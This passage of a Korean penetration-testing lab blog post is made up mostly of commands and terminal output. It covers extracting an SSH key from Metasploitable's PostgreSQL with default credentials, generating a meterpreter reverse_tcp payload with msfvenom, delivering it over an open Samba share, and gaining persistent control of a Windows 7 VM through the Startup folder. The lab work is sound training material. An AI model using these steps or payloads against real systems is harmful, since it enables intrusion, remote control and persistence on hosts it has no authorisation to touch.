---------------------------------------------------------------------------------------------------------
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6
PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0OhWBV0x1c6iPL/0zUYFHyFKAz1e6/5te
oweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYg
ZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D
9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf
+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable
(1 row)
(END)
q
- PostgresSQL 접속 종료
postgres=# \q
root@kali:~#
Ex6) SSH RSA 키를 획득하기 위한 PostgresSQL 서버 재접속
- sshkeys 테이블 접속 및 SSH Key 저장 실시
root@kali:~# psql -h 192.168.20.204 -U postgres -c 'select * from sshkeys limit 1' | tee sshkeys.txt
Password for user postgres: postgres
auth_key
---------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6
PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0OhWBV0x1c6iPL/0zUYFHyFKAz1e6/5te
oweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYg
ZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D
9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf
+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable
(1 row)
- 'sshkeys.txt' 파일 확인
root@kali:~# ls -l sshkeys.txt
-rw-r--r-- 1 root root 1229 6 월 3 12:42 sshkeys.txt
root@kali:~# cat sshkeys.txt
auth_key
---------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6
PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0OhWBV0x1c6iPL/0zUYFHyFKAz1e6/5te
oweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYg
ZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D
9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf
+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable
- sshkeys 테이블 접속 및 SSH Key 저장 실시
root@kali:~# psql -h 192.168.20.204 -U postgres -c 'select * from sshkeys limit 1' | tee sshkeys.txt
Password for user postgres: postgres
auth_key
---------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6
PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0OhWBV0x1c6iPL/0zUYFHyFKAz1e6/5te
oweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYg
ZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D
9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf
+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable
(1 row)
- 'sshkeys.txt' 파일 확인
root@kali:~# ls -l sshkeys.txt
-rw-r--r-- 1 root root 1229 6 월 3 12:42 sshkeys.txt
root@kali:~# cat sshkeys.txt
auth_key
---------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6
PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0OhWBV0x1c6iPL/0zUYFHyFKAz1e6/5te
oweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYg
ZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D
9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf
+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable
(1 row)
- 'sshkeys.txt' 내용 중 'ssh-rsa' 글자를 검색하여 2 번째 필드까지 확인
root@kali:~# grep "ssh-rsa" sshkeys.txt | awk '{print $2}'
AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6
PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0OhWBV0x1c6iPL/0zUYFHyFKAz1e6/5te
oweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYg
ZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D
9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf
+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w==
- '==' 부분만 빼고 다시 확인
root@kali:~# grep "ssh-rsa" sshkeys.txt | awk '{print $2}' | sed 's/==$//'
AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6
PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0OhWBV0x1c6iPL/0zUYFHyFKAz1e6/5te
oweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYg
ZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D
9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf
+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w
- '/var/tmp/rsa/2048/*.pub' 파일 내용중 'sshkeys.txt' 파일과 동일한 내용을 검색하여 'keys.txt'로 저장 실시
root@kali:~# fgrep `grep "ssh-rsa" sshkeys.txt | awk '{print $2}' | sed 's/==$//'` /var/tmp/rsa/2048/*.pub | tee
keys.txt
(Reverse TCP 공격)
- 메타스플로잇 자체적으로도 할수 있는 테스트이지만, Exploit 공격 코드를 직접 제작하여 테스트한다.
- 또한, 백도어를 생성하고, 공격 코드(악성 코드)를 유입시켜 타겟 시스템이 공격자에게 연결되도록
테스트
mkdir -p /share
root@kali:~# chmod 777 /share
root@kali:~# vi /etc/samba/smb.conf
~ 중간 생략 ~
[share]
comment = Test Shared Directory
path = /share
browseable = yes
read only = no
writable = yes
public = yes
: wq!
- 메타스플로잇 자체적으로도 할수 있는 테스트이지만, Exploit 공격 코드를 직접 제작하여 테스트한다.
- 또한, 백도어를 생성하고, 공격 코드(악성 코드)를 유입시켜 타겟 시스템이 공격자에게 연결되도록 테스트한다.
[실습 단계]
스캔 -> 공격 타겟 선정 -> 백도어 구성 -> 공격 코드 파일 생성 -> 공격 타겟에 공격 코드 파일 유입 실시
-> 백도어 실행 -> 공격 코드 파일 실행 -> 제어권 획득
Samba 서비스 구성
Kali Linux
- 차후 Window7에서 악성 코드 파일을 복사하기 위해서 Samba 서비스를 구성
root@kali:~# mkdir -p /share
root@kali:~# chmod 777 /share
root@kali:~# vi /etc/samba/smb.conf
|
~ 중간 생략 ~
[share] : wq! |
- Samba 서비스 재시작 및 공유 상태 확인
root@kali:~# service smbd restart
root@kali:~# smbclient -L localhost -N
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 4.1.17-Debian]
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
share Disk Test Shared Directory
IPC$ IPC IPC Service (Samba 4.1.17-Debian)
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 4.1.17-Debian]
Server Comment
--------- -------
Workgroup Master
--------- -------
백도어 생성
- msfconsole로 실행할 백도어를 생성한다.
@ Kali Linux
root@kali:~# mkdir -p /root/bin
root@kali:~# cd /root/bin
root@kali:~/bin# vi reverse_resource.rc
|
use exploit/multi/handler
: wq! |
Payload를 사용하여 공격 코드 생성
- Window7에 유입시킬 'reverse.exe' 공격 코드 파일을 생성한다.
Kali Linux
root@kali:~/bin# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.20.50 LPORT=4444 -f exe -o reverse.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86_64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Saved as: reverse.exe
root@kali:~/bin# ls re*
reverse.exe reverse_resource.rc
Ex4) 'reverse.exe' 공격 코드 파일 유입
- 테스트 환경에서는 Window7에서 Kali Linux으로부터 'reverse.exe' 파일을 공유받도록 한다.
@ Kali Linux
root@kali:~/bin# cp reverse.exe /share
root@kali:~/bin# ls /share
reverse.exe
- Window7에서 'reverse.exe' 파일을 다운로드하도록 한다.
@ Window7
실행(윈도우 키 + R) -> \\192.168.20.50
'share' 디렉토리 클릭
'reverse.exe' 파일 바탕 화면에 복사 실시
'reverse.exe' 파일 복사 완료
Ex5) 백도어 'reverse_resource.rc' 실행
@ Kali Linux
root@kali:~/bin# msfconsole -r reverse_resource.rc
_ _
/ \ /\ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
|/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\
Save 45% of your time on large engagements with Metasploit Pro
Learn more on http://rapid7.com/metasploit
=[ metasploit v4.11.5-2016010401 ]
+ -- --=[ 1517 exploits - 875 auxiliary - 257 post ]
+ -- --=[ 437 payloads - 37 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
[*] Processing reverse_resource.rc for ERB directives.
resource (reverse_resource.rc)> use exploit/multi/handler
resource (reverse_resource.rc)> set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
resource (reverse_resource.rc)> set LHOST 192.168.20.50
LHOST => 192.168.20.50
resource (reverse_resource.rc)> set ExitSession false
ExitSession => false
resource (reverse_resource.rc)> exploit -j -z
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.20.50:4444
[*] Starting the payload handler...
msf exploit(handler) >
'reverse.exe' 공격 코드 파일 실행
Window7
Ex7) 백도어 'reverse_resource.rc' 상태 확인
- Window7이 Kali Linux에 연결되었는지 확인한다.
@ Kali Linux
msf exploit(handler) >
[*] Sending stage (1188911 bytes) to 192.168.20.202
[*] Meterpreter session 1 opened (192.168.20.50:4444 -> 192.168.20.202:49190) at 2016-06-03 16:30:56 +0900
msf exploit(handler) > sessions -i
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x64/win64 WIN7\soldesk @ WIN7 192.168.20.50:4444 -> 192.168.20.202:49190 (192.168.20.202)
- Window7 제어권 획득 실시
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
meterpreter > sysinfo
Computer : WIN7
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : ko_KR
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/win64
meterpreter > ipconfig
Interface 1
============
Name : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
Interface 11
============
Name : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:ac:07:68
MTU : 1500
IPv4 Address : 192.168.20.202
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::813f:bb18:8a6:9cfe
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 12
============
Name : Microsoft ISATAP Adapter
Hardware MAC : 00:00:00:00:00:00
MTU : 1280
IPv6 Address : fe80::5efe:c0a8:14ca
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
meterpreter > getuid
Server username: WIN7\root
meterpreter > pwd
C:\Users\soldesk\Desktop
meterpreter > lpwd
/root/bin
meterpreter > ls
Listing: C:\Users\soldesk\Desktop
=================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2016-05-30 16:08:29 +0900 Security
100666/rw-rw-rw- 282 fil 2015-12-11 17:45:11 +0900 desktop.ini
100777/rwxrwxrwx 7168 fil 2016-06-03 16:13:33 +0900 reverse.exe
meterpreter > download -r desktop.ini /root/bin
[*] downloading: desktop.ini -> /root/bin/desktop.ini
[*] skipped : desktop.ini -> /root/bin/desktop.ini
meterpreter > pwd
C:\Users\soldesk\Desktop
meterpreter > cd ..
meterpreter > pwd
C:\Users\soldesk
meterpreter > cd AppData
meterpreter > cd Roaming
meterpreter > cd Microsoft
meterpreter > pwd
C:\Users\soldesk\AppData\Roaming\Microsoft
meterpreter > cd Windows
meterpreter > cd "Start Menu"
meterpreter > cd Programs
meterpreter > pwd
C:\Users\soldesk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs
meterpreter > cd Startup
meterpreter > pwd
C:\Users\soldesk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
meterpreter > upload reverse.exe
[*] uploading : reverse.exe -> reverse.exe
[*] uploaded : reverse.exe -> reverse.exe
meterpreter >
meterpreter > reboot
Rebooting...
meterpreter >
[*] 192.168.20.202 - Meterpreter session 1 closed. Reason: Died
msf exploit(handler) > quit
root@kali:~/bin#
Ex9) 백도어 'reverse_resource.rc' 실행
@ Kali Linux
root@kali:~/bin# msfconsole -r reverse_resource.rc
~ 중간 생략 ~
[*] Started reverse TCP handler on 192.168.20.50:4444
[*] Starting the payload handler...
Ex8) Window7 확인
재부팅 진행중
윈도우 시작 -> 모든 프로그램 -> 시작프로그램 -> 'reverse' 확인
Ex9) 백도어 'reverse_resource.rc' 상태 확인
- Window7 사용자가 로그인하면, 자동으로 'reverse.exe' 파일이 실행되므로 자동으로 Kali Linux에 연결된다.
@ Kali Linux
msf exploit(handler) >
[*] Sending stage (1188911 bytes) to 192.168.20.202
[*] Meterpreter session 1 opened (192.168.20.50:4444 -> 192.168.20.202:49179) at 2016-06-03 16:55:25 +0900
msf exploit(handler) > sessions -i
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x64/win64 WIN7\soldesk @ WIN7 192.168.20.50:4444 -> 192.168.20.202:49179 (192.168.20.202)
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : WIN7
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : ko_KR
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/win64
-
'네트워크/서버/모의해킹 > 메타스플로잇' 카테고리의 다른 글
| 17.5.19(65일차 메타스폴로잇3) (513) | 2017.05.19 |
|---|---|
| 17.5.17(64일차 메타스폴로잇2) (478) | 2017.05.18 |
